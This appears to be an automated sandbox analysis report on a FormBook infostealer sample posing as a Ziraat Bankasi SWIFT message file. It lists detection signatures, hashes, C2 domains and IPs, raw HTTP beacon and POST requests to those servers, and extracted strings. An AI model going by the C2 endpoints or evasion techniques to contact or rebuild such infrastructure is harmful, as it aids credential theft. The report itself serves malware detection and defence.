Windows Analysis Report
Ziraat Bankasi Swift Mesaji20221129-34221.exe

Overview

General Information

Sample Name: Ziraat Bankasi Swift Mesaji20221129-34221.exe
Analysis ID: 755920
MD5: 6a0ff43510923c27b144bf86b5e0a867
SHA1: 880c264f12ea2175a81f7030dec9c7043093253f
SHA256: 52426e75e25f69d9d7a8121464fe16a213ab48519ae10b2e2fc028ce86794a8b

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Injects a PE file into a foreign processes
.NET source code contains method to dynamically call methods (often used by packers)
Queues an APC in another process (thread injection)
Deletes itself after installation
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

AV Detection

Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe Virustotal: Detection: 44%
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe ReversingLabs: Detection: 39%
Source: Yara match File source: 0000000A.00000002.560048415.0000000000820000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.559572185.00000000003C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.450620046.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.562531717.0000000000ED0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.413620011.000000000DEDE000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.388632949.000000000DEDE000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: http://www.oaksinstitute.net/qmpa/?mRh4lr=5Yvs1mt+8koK04wDmvle7hFJkaWhy6okw1CCpgEhtGW9Nwizn2cFt5qaMIq71RWOXG0+Z4ku5zJzPR6AZImqbF2d7jI61SlZkw==&VrWd=-Z5PLbzhUhYhR8K Avira URL Cloud: Label: malware
Source: http://www.multimediapages.com/qmpa/?mRh4lr=rejTwVtqfB30O9nwV+ATTccd4/r3ZShDvm2ExT48d5W41t5gt2xe96xDcyDktEvrNydQ6GKmhPSZbQq/61ftArfg9GGH4Fupqg==&VrWd=-Z5PLbzhUhYhR8K Avira URL Cloud: Label: malware
Source: http://www.oaksinstitute.net/qmpa/ Avira URL Cloud: Label: malware
Source: http://www.multimediapages.com/qmpa/ Avira URL Cloud: Label: malware
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe Joe Sandbox ML: detected
Source: 0000000A.00000002.560048415.0000000000820000.00000040.10000000.00040000.00000000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.erwgcb.top/qmpa/"]}
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: wntdll.pdbUGP source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, systray.exe
Source: Binary string: wntdll.pdb source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, systray.exe
Source: Binary string: bqbz.pdb source: Ziraat Bankasi Swift Mesaji20221129-34221.exe

Networking

Source: C:\Windows\explorer.exe Domain query: www.notarpucarhr.com
Source: C:\Windows\explorer.exe Domain query: www.oaksinstitute.net
Source: C:\Windows\explorer.exe Network Connect: 103.11.189.189 80
Source: C:\Windows\explorer.exe Domain query: www.multimediapages.com
Source: C:\Windows\explorer.exe Network Connect: 141.136.43.229 80
Source: C:\Windows\explorer.exe Network Connect: 38.239.92.131 80
Source: Malware configuration extractor URLs: www.erwgcb.top/qmpa/
Source: Joe Sandbox View ASN Name: VODIEN-AS-AP-LOC2VodienInternetSolutionsPteLtdSG VODIEN-AS-AP-LOC2VodienInternetSolutionsPteLtdSG
Source: Joe Sandbox View ASN Name: SENDER-ASLT SENDER-ASLT
Source: global traffic HTTP traffic detected: GET /qmpa/?mRh4lr=EgIWtG18ZIzAqtaO1OmvkFLdPjhKt8Mp7J5Y1fxWkEB6Q9kPLkR881s923Q+G4W9S+aNob6MQv0YuDJ73ehw8miGBWwdljwfXw==&VrWd=-Z5PLbzhUhYhR8K HTTP/1.1Host: www.notarpucarhr.comConnection: close
Source: global traffic HTTP traffic detected: GET /qmpa/?mRh4lr=rejTwVtqfB30O9nwV+ATTccd4/r3ZShDvm2ExT48d5W41t5gt2xe96xDcyDktEvrNydQ6GKmhPSZbQq/61ftArfg9GGH4Fupqg==&VrWd=-Z5PLbzhUhYhR8K HTTP/1.1Host: www.multimediapages.comConnection: close
Source: global traffic HTTP traffic detected: GET /qmpa/?mRh4lr=5Yvs1mt+8koK04wDmvle7hFJkaWhy6okw1CCpgEhtGW9Nwizn2cFt5qaMIq71RWOXG0+Z4ku5zJzPR6AZImqbF2d7jI61SlZkw==&VrWd=-Z5PLbzhUhYhR8K HTTP/1.1Host: www.oaksinstitute.netConnection: close
Source: Joe Sandbox View IP Address: 103.11.189.189 103.11.189.189
Source: global traffic HTTP traffic detected: POST /qmpa/ HTTP/1.1Host: www.multimediapages.comConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.multimediapages.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.multimediapages.com/qmpa/Accept-Language: en-USAccept-Encoding: gzip, deflate
Source: global traffic HTTP traffic detected: POST /qmpa/ HTTP/1.1Host: www.oaksinstitute.netConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.oaksinstitute.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.oaksinstitute.net/qmpa/Accept-Language: en-USAccept-Encoding: gzip, deflate
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Tue, 29 Nov 2022 09:18:17 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzip
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Tue, 29 Nov 2022 09:18:20 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-Encoding
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000002.336589275.00000000072C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://fontfabrik.com
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000002.336589275.00000000072C2000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.299768442.000000000601A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe String found in binary or memory: http://www.carterandcone.com
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe String found in binary or memory: http://www.carterandcone.com69
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.299938247.000000000601A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.com8I
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.299938247.000000000601A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.comFH
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.299949266.0000000006033000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.299985983.0000000006035000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.comGr
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe String found in binary or memory: http://www.carterandcone.comand
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe String found in binary or memory: http://www.carterandcone.comce
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300141919.0000000006035000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300119023.0000000006035000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.comfac
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300403427.0000000006034000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300428223.0000000006034000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300558881.0000000006034000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300634815.0000000006034000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.comhy/
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300331288.0000000006037000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300357512.0000000006035000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300342875.0000000006035000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.comily
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe String found in binary or memory: http://www.carterandcone.comits
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300233806.0000000006035000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.comitse
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000002.336589275.00000000072C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.299985983.0000000006035000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.coml-B(
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe String found in binary or memory: http://www.carterandcone.compe
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300357512.0000000006035000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300342875.0000000006035000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.comre
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300403427.0000000006034000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300174244.0000000006034000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.299985983.0000000006035000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300428223.0000000006034000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300331288.0000000006037000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300233806.0000000006035000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300190057.0000000006035000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300258498.0000000006035000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300033238.0000000006034000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300141919.0000000006035000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300357512.0000000006035000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300119023.0000000006035000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300099384.0000000006034000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300342875.0000000006035000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.comsigW
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300331288.0000000006037000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300233806.0000000006035000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300190057.0000000006035000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300258498.0000000006035000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300357512.0000000006035000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300342875.0000000006035000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.comsign
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000002.336589275.00000000072C2000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.306938961.000000000600B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.304677827.0000000006034000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.306012210.0000000006034000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers%
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.304296667.0000000006043000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.304341992.0000000006043000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.304099259.0000000006043000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.304382226.0000000006043000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.304209518.0000000006043000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.304170705.0000000006043000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.304435662.0000000006043000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000002.336589275.00000000072C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.305767115.000000000600D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000002.336589275.00000000072C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000002.336589275.00000000072C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.305003600.0000000006034000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000002.336589275.00000000072C2000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.305032513.0000000006034000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.305068305.0000000006035000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000002.336589275.00000000072C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000002.336589275.00000000072C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.304189881.0000000006034000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersH
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.312655895.0000000006034000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersW
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.312655895.0000000006034000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.312618448.0000000006035000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersiv
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.306938961.000000000600B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comF
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.306938961.000000000600B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comL.TTF
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.320113972.0000000006006000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.coma$
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.305767115.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.306938961.000000000600B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comalicg
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.306938961.000000000600B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comals$
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.305767115.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.306938961.000000000600B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comdP
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.320113972.0000000006006000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comicu
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.320113972.0000000006006000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.coml1
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.306938961.000000000600B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comm
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.306938961.000000000600B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.commsedY
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.306938961.000000000600B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comueedl
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000002.336589275.00000000072C2000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.297868606.000000000601B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fonts.com
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.297839542.000000000601B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fonts.comcom
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000002.336589275.00000000072C2000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.299606103.0000000006033000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.299501081.0000000006033000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000002.336589275.00000000072C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000002.336589275.00000000072C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.299462548.0000000006033000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cntsP=
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.299447483.0000000006033000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cntsP=tx
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.299447483.0000000006033000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.299462548.0000000006033000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cnu-e
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.308810403.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.308658468.000000000600D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.308810403.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.308658468.000000000600D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/:
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000002.336589275.00000000072C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000002.336589275.00000000072C2000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.308674164.0000000006012000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.308958537.0000000006012000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.309958548.0000000006034000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.309176604.0000000006034000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.309323595.0000000006034000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.309409920.0000000006034000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.309038359.0000000006034000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.309119313.0000000006034000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.308591362.0000000006034000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.309275276.0000000006034000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.309634439.0000000006034000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.308723291.0000000006034000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.309847410.0000000006034000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.309538175.0000000006034000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.308827341.0000000006034000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.309771643.0000000006034000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 
00000002.00000003.308893439.0000000006034000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htmtr-tr
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000002.336589275.00000000072C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300913114.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301779924.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.302653539.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.302751937.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301567715.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.302146273.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301888455.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301491988.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.302492163.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301677692.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.302077028.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301987162.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301216806.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301157376.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 
00000002.00000003.302242022.000000000600D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
